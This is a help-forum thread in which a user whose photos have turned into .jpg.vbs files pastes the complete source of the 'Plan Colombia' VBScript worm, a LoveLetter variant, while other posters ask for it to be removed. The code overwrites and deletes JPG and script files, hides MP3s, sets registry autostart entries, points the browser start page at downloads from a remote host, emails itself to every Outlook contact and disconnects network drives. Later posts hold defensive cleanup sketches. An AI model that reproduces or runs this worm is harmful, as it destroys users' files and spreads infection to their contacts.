
Status
Not open for further replies.
1 - 19 of 19 Posts

·
Registered
Joined
·
6 Posts
Discussion Starter #1
Something in my system has converted my jpg's to VB Script files!

All my family photos are suddenly not available. Their names remain as so and so photo.jpg, but the type of file is now VB Script. Also, the date on each jpg is updated each time I boot the computer.

When I double click each file, the hourglass begins to spin as if it is trying to open, then nothing.

I use a Canon photo handler called Zoom Browser.

Help!
 

·
ID10T Circuit replacement
Joined
·
1,038 Posts
Do you have a current antivirus scanner? It sounds either like a virus, or your file association is misconfigured. Open up My Computer, click Tools --> Folder Options, then View. In there, remove the check mark for 'Hide extensions for known file types'. Click 'OK'.

Open up the folder with the pictures and see if they are photo.jpg.vbs or something similar. If they are, right click on the file and click 'Edit'. This should bring up Notepad. If you post some of the text from this file, I can help determine if it is a virus, and if the virus may have saved your pictures somewhere else.

If the file is still photo.jpg, then we need to correct the file assoc.

Let me know.
 

·
Registered
Joined
·
6 Posts
Discussion Starter #3
Thanks!

Yep! There it is! The names of the file are xxx.jpg.vbs. Now what?



rem ===============================================================================================
rem "Plan Colombia" virus v1.0
rem by Sand Ja9e Gr0w (www.colombia.com)

rem Dedicated to all the people that want to be hackers or crackers, in Colombia
rem This program is also a protest act against the violence and corruption that Colombia lives...
rem I always wanting that all this finishes, I have said...


rem Santa fe de Bogotá 2000/09
rem I dedicate to all you the song "GoodBye" of Andreas Bochelli
rem =================================================================================================


rem Thanks God..!
rem A greeting for "Lina María" from "Santa fe de Bogotá"
rem A greeting for "Tizo" from "Spain"
rem And One kicked of tail to my friends, "eL ChE" and "ThE SpY"

rem okay, ok...
rem my baby start here...


On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye
eq=""
ctr=0

randomize
numero = Int(Rnd * 3) + 1
polye = ".GIF.vbs"
If numero = 1 Then
polye = ".BMP.vbs"
Else
If numero = 2 Then
polye = ".JPG.vbs"
End If
End If


polyn="\"&polyname(Int(Rnd * 5) + 4)&polye

Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso_OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
If Day(Now) = 17 And Month(Now) = 9 Then
MsgBox "Dedicated to my best brother=>Christiam Julian(C.J.G.S.)" & Chr(13) & "Att. " & polyname(5) & " (M.H.M. TEAM)"
killnet()
End If



sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\LINUX32.vbs")
c.Copy(dirwin&"\reload.vbs")
c.Copy(dirsystem&polyn)
regruns()
html()
spreadtoemail()
listadriv()
end sub



sub regruns()
On Error Resume Next
Dim num,downread,res
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX32",dirsystem&"\LINUX32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\reload",dirwin&"\reload.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if

rem acepta nombres largos..?
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
Randomize
num = Int((4 * Rnd) + 1)

rem fatal => send virii
if num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://members.fortunecity.com/plancolombia/macromedia32.zip"
else
rem oh,, a picture.. nice :)
if num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://members.fortunecity.com/plancolombia/linux321.zip"
else
rem oh,, other picture =:()
if num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://members.fortunecity.com/plancolombia/linux322.zip"
end if
end if
end if
end if

if (fileexist(downread&"\MACROMEDIA32.zip")=0) then
res = Shell("copy " & downread & "\MACROMEDIA32.zip " & dirwin & "\important_note.txt", vbHide)
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\plan colombia",dirwin&"\important_note.txt"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
else
if (fileexist(downread&"\linux321.zip")=0) then
Kill (dirwin & "\logos.sys")
res = Shell("copy " & downread & "\linux321.zip " & dirwin & "\logos.sys", vbHide)
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
else
if (fileexist(downread&"\linux322.zip")=0) then
Kill (dirwin & "\logow.sys")
res = Shell("copy " & downread & "\linux322.zip " & dirwin & "\logow.sys", vbHide)
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end if
end if
end sub



sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives

For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next

listadriv = s
end sub



sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files

for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso_OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
else
if(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso_OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
else
if(ext="jpg") or (ext="jpeg") then
set ap=fso_OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
else
if(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
end if
end if
end if
next

end sub



sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders

for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next

end sub


sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub


function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function


function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function


function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function



sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,correoad,b,regedit,regv,regad,textosub,textobod

set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")

Randomize
numero = Int(Rnd * 3) + 1
textosub = ""
If numero = 1 Then
textosub = "US PRESIDENT AND FBI SECRETS =PLEASE VISIT => (http://WWW.2600.COM)<="
Else
If numero = 2 Then
textosub = polyname(6)
End If
End If


Randomize
numero = Int(Rnd * 3) + 1
textobod = ""
If numero = 1 Then
textobod = "VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES.."
Else
If numero = 2 Then
textobod = polyname(10)
End If
End If


for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1 to a.AddressEntries.Count
correoad=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&correoad)
if (regad="") then
set correo=out.CreateItem(0)
correo.Recipients.Add(correoad)
correo.Subject = textosub
correo.Body = vbcrlf&textobod
correo.Attachments.Add(dirsystem&polyn)
correo.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&correoad,1,"REG_DWORD"
end if
x=x+1
next

regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next

Set out=Nothing
Set mapi=Nothing
end sub


Function polyname(n)
Dim i, vector, texto, pos
on error resume next
rem polyformic ( ohhhh yeahhh...) very good polyformic engine :() by Sand Ja9e Gr0w

vector = Array("A", "E", "I", "O", "U")
texto = ""
Randomize
For i = 1 To n
Randomize
rem consonante
texto = texto&Chr(Int((Rnd * 25) + 65))
i = i + 1
If i > n Then
exit for
end if
rem vocal
texto = texto&vector(Int((Rnd * 4) + 1))
Randomize
Next

polyname = texto
End Function




sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD>"&_
"<?-?HEAD><BODY [email protected]@window.name=#-#main#-#;window.open(#-#US-PRESIDENT-AND-FBI-SECRETS.HTM# -#,#-#main#-#)@[email protected] "&vbcrlf& _
"[email protected]@window.name=#-#main#-#;window.open(#-#US-PRESIDENT-AND-FBI-SECRETS.HTM# -#,#-#main#-#)@[email protected] [email protected]@[email protected]@ [email protected]@#[email protected]@>"&vbcrlf& _
"<CENTER><p>M.H.M TEAM <?-?p><p>Colombia<BR>- Please press #-#YES#-# button for see secret pictures<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE [email protected]@[email protected]@ [email protected]@[email protected]@>Hello Colombia...! Since Here, after, since other part of World..<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT [email protected]@[email protected]@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT [email protected]@[email protected]@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="

dta2="set fso=CreateObject(@[email protected]@[email protected])"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@[email protected]^-^[email protected]@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@[email protected]^-^[email protected]@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @[email protected]: can#-#t load Pictures. IE internal [email protected]@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@[email protected]@[email protected])"&vbcrlf& _
"regedit.RegWrite @[email protected]_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^[email protected]@,dirsystem&@[email protected]^-^[email protected]@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"

dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso_OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)

for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next

set b=fso.CreateTextFile(dirsystem+"\US-PRESIDENT-AND-FBI-SECRETS.HTM")
b.close
set d=fso_OpenTextFile(dirsystem+"\US-PRESIDENT-AND-FBI-SECRETS.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub



sub killnet()
Dim intDrive,strDrive,WSHNetwork

on error resume next


Set WSHNetwork = WScript.CreateObject("WScript.Network")

For intDrive = 26 To 5 Step -1
strDrive = Chr(intDrive + 64) & ":"
WSHNetwork.RemoveNetworkDrive strDrive
Next

rem bye net connection ... :-(
Set WSHNetwork=Nothing

end sub
 

·
Registered
Joined
·
266 Posts
woodburyrd,

I've very bad news for you.
I hope you have all your pictures backed up. They're all gone.

Get a good Antivirus and try to save what's left.
Check your MP3's, probably they have been renamed too.

Let us know if you need any more help removing the virus.
 

·
Registered
Joined
·
266 Posts
see this line?

rem okay, ok...
rem my baby start here...
this is the creator of this stupid script, bragging about his "creation". what a lamer.
 

·
Registered
Joined
·
266 Posts
woodburyrd,

YOU NEED TO EDIT YOUR SECOND POST TO REMOVE THE CONTENT OF THE FILE. THERE'S A VIRUS WITHIN THE POST.

REMOVE IT A.S.A.P
 

·
Registered
Joined
·
139 Posts
It bears repeating: no one, but NO ONE should EVER be without an updated antivirus AND firewall!

When will people EVER learn? It's all over the news, every day!
 

·
ID10T Circuit replacement
Joined
·
1,038 Posts
Sorry it took so long, but Breakerfall and music freak jumped right in.

Please do edit your post. Or maybe a moderator will do this. We do not need another variant.

FYI
This is listed under a variant of the loveletter virus. The coding is a little bit different, but accomplishes the same. Your files were not renamed or backed up; they were deleted and then the copy of the virus was put in their place with the double extension.
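A triage sketch for the damage described in this thread, added here as an example and not part of the original posts: it lists every `<name>.<media-ext>.vbs` file under a folder, reports whether the media file it names still sits beside it, and groups the decoys by hash to show they are identical copies. The function name `triage` is hypothetical; the two extension sets follow the file-handling routine in the script posted above, which leaves MP3/MP2 originals in place with the hidden attribute set.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

# Media extensions handled by the script posted in this thread.
OVERWRITTEN = {"jpg", "jpeg"}  # content replaced, file re-created as <name>.vbs
HIDDEN = {"mp3", "mp2"}        # original kept but hidden, <name>.vbs added beside it


def triage(root):
    """Find <name>.<media-ext>.vbs files under root (hypothetical helper).

    Returns (findings, groups):
      findings - sorted list of (decoy_path, status); status says whether the
                 media file named by the decoy still exists next to it
      groups   - sha256 -> decoy paths; one big group means identical copies
    """
    findings, groups = [], defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            stem, ext = os.path.splitext(name)
            inner = os.path.splitext(stem)[1].lstrip(".").lower()
            if ext.lower() != ".vbs" or inner not in OVERWRITTEN | HIDDEN:
                continue
            decoy = os.path.join(dirpath, name)
            present = os.path.exists(os.path.join(dirpath, stem))
            findings.append((decoy, "original-present" if present else "original-missing"))
            with open(decoy, "rb") as fh:
                groups[hashlib.sha256(fh.read()).hexdigest()].append(decoy)
    return sorted(findings), dict(groups)


if __name__ == "__main__":
    # Constructed sample tree: harmless placeholder bytes, not real script content.
    with tempfile.TemporaryDirectory() as root:
        for rel in ("beach.jpg.vbs", "song.mp3", "song.mp3.vbs", "notes.vbs"):
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(b"placeholder")
        found, by_hash = triage(root)
        for path, status in found:
            print(status, os.path.basename(path))
        print(len(by_hash), "distinct decoy content hash(es)")
```

Files reported as `original-present` are the ones worth recovering first: clear the hidden attribute on the media file and delete the `.vbs` beside it.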
 

·
TSF Enthusiast
Joined
·
6,298 Posts
Tough luck.

Exact same thing happened to me - I had Norton with updated definitions, too, but it didn't matter because it wasn't configured to scan .vbs files.

It's ok to cry
 

·
TSF Enthusiast
Joined
·
6,298 Posts
VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES..
very joke? man, what a tool.
 

·
Registered
Joined
·
266 Posts
woodburyrd,

PLEASE, remove your second post,
unintentionally, you posted the virus on the thread.

thanks
 

·
TSF Enthusiast
Joined
·
6,298 Posts
hit the edit button near it, check the delete box and then hit the delete button.
 

·
TSF Enthusiast
Joined
·
6,298 Posts
I don't think it's that big a deal...some people freak out when they see virus source code, but I doubt it's that rare that it can't be found anywhere else...I mean, it is a variant of the most propagated virus ever, right?
 

·
Registered
Joined
·
2 Posts
BUMP...Found this dreaded virus again!
I am new here, and just bought a Compaq 2266 with Windows 98 (1st edition) and the virus has renamed virtually all Jpgs, except some later added bitmaps that I opened with IE and then re-saved as Jpegs. I ran the Norton...yep, you guessed it!
Symantec Norton Anti-Virus installed, the only AV I ever spent good money on only to switch to freeware. The S T I N G E R app is supposed to aid computers affected by viruses, as well as the possibility Compaq has a sector of restoration ware on these Presarios. Most apps are running and the virus scan was run as well, presumably fixing files that it was able to. Can Grisoft's AVS <sp?> work on Windows 98 without the SE additions?
A few software items won't install because it dates to 1998.
I want to save as many pic files as I can and I found these viruses maybe dated different but act the same. I noted the IE link went to Colombia web site and I checked it on a good computer and nothing happened, but I fear it's a trojan in lurking. Help requested ASAP
 

·
Registered
Joined
·
2 Posts
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\WAB\*

I found these references to changes in the Registry, can someone tell me the variations for XP, vs Win98 so I can find the spots to alter correctly?
I came upon this using SEARCH and not picking the forum of XP over Win 9x, so sorry about that.
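An added example, not part of the original thread: the script posted earlier writes `LINUX32` and `reload` values under the `Run` and `RunServices` keys and points the IE Start Page at a `.zip` download, so a registry export can be checked for autorun values that launch script files and for a Start Page that ends in a download. The helper name `audit_reg_export` is hypothetical, and the sample export, its file paths and its URL are constructed.

```python
import re

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Services|Once)?$", re.I)
IE_MAIN = re.compile(r"\\Internet Explorer\\Main$", re.I)
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta")
DOWNLOAD_EXT = (".zip", ".exe") + SCRIPT_EXT

# Constructed sample export; value names come from the posted script, paths are assumed.
SAMPLE_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"LINUX32"="C:\\WINDOWS\\SYSTEM\\LINUX32.vbs"
"SystemTray"="SysTray.Exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"reload"="C:\\WINDOWS\\reload.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://example.invalid/archive.zip"
"""


def audit_reg_export(text):
    """Return (finding, key, value_name, data) tuples for a .reg export (hypothetical helper)."""
    findings, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]  # remember the key the following values belong to
            continue
        m = re.match(r'"([^"]+)"="(.*)"$', line)  # string values only
        if not m or key is None:
            continue
        name, data = m.group(1), m.group(2).replace("\\\\", "\\")
        if RUN_KEY.search(key) and data.lower().endswith(SCRIPT_EXT):
            findings.append(("autorun-script", key, name, data))
        elif IE_MAIN.search(key) and name == "Start Page" and data.lower().endswith(DOWNLOAD_EXT):
            findings.append(("start-page-download", key, name, data))
    return findings


if __name__ == "__main__":
    for finding in audit_reg_export(SAMPLE_EXPORT):
        print(*finding, sep=" | ")
```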
 